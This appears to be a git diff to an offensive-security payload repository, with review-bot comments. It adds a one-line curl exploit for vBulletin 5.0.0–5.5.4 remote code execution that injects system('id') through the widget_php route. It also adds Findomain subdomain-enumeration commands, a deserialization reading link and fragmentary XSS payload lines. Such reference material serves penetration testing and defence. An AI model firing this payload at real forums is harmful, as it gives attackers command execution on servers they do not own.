diff --git a/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh new file mode 100644 index 0000000..3ebf64a --- /dev/null +++ b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh @@ -0,0 +1 @@ +curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;" \ No newline at end of file diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index 4a0ed0f..aa05825 100644 --- a/Insecure Deserialization/README.md +++ b/Insecure Deserialization/README.md @@ -24,4 +24,5 @@ Check the following sub-sections, located in other files : * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg * [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) -* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals \ No newline at end of file +* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals +* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) \ No newline at end of file diff --git a/Methodology and Resources/Subdomains Enumeration.md b/Methodology and Resources/Subdomains Enumeration.md index 0806a99..88ee0e2 100644 --- a/Methodology and Resources/Subdomains Enumeration.md +++ b/Methodology and Resources/Subdomains Enumeration.md @@ -9,6 +9,7 @@ * EyeWitness * Sublist3r * Subfinder + * Findomain * Aquatone (Ruby and Go versions) * AltDNS * MassDNS 
@@ -86,6 +87,17 @@ go get github.com/subfinder/subfinder ./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt ``` +### Using Findomain + +```powershell +$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux +$ chmod +x findomain-linux +$ findomain_spyse_token="YourAccessToken" +$ findomain_virustotal_token="YourAccessToken" +$ findomain_fb_token="YourAccessToken" +$ ./findomain-linux -t example.com -o +``` + ### Using Aquatone - old version (Ruby) ```powershell diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 6bd8aa1..a0ccd8a 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -751,6 +751,8 @@ You don't need to close your tags. ```javascript %26%2397;lert(1) +alert +> ``` ### Bypass using Katana
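Review bot: the new file `CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh` is a single `curl` line with no shebang and no trailing newline (`\ No newline at end of file`), so it is not a runnable script despite the `.sh` extension; add a `#!/bin/sh` first line, end the file with a newline, and put the affected version range and the source reference in a header comment rather than only in the filename. The filename itself contains spaces, which every caller has to quote, and the request runs with `-k`, which disables TLS certificate verification; if that is intentional for lab targets it deserves a comment.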
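Review bot: the added reference in `Insecure Deserialization/README.md`, `* [Diving into unserialize() - Sep 19- Vickie Li](...)`, does not follow the `[Title](url) by Author` convention of the surrounding entries; reformat it as `* [Diving into unserialize()](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) by Vickie Li`. The hunk also leaves the file without a trailing newline (`\ No newline at end of file` on the added line), and the unchanged context line `* [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](...)` has an unmatched opening parenthesis that would be cheap to fix in the same change.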
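Review bot: in the new `### Using Findomain` block, the three lines `$ findomain_spyse_token="YourAccessToken"`, `$ findomain_virustotal_token="YourAccessToken"` and `$ findomain_fb_token="YourAccessToken"` are plain shell variable assignments without `export`, so in bash they remain local to the interactive shell and are not visible to the `./findomain-linux` child process; write them as `export findomain_spyse_token="YourAccessToken"` (and likewise for the other two), or prefix the final command with the assignments. The fence is tagged `powershell` although the commands (`wget`, `chmod +x`, `./findomain-linux`) are Linux shell; that matches the existing `### Using Aquatone` block in this file, but `bash` would be the accurate tag. Separately, the binary is fetched from `releases/latest` and made executable with no integrity check; a line telling the reader to verify the published checksum or signature before `chmod +x` would be worth adding.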
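Review bot: the two lines added to the `javascript` block under "You don't need to close your tags." in `XSS Injection/README.md`, `+alert` and `+>`, are bare fragments with no surrounding tag and no explanation, so a reader cannot tell what payload they form or how they relate to the `%26%2397;lert(1)` line above them; either show the complete payload on one line or add a short comment saying which tag is being left unclosed and why the fragment still executes.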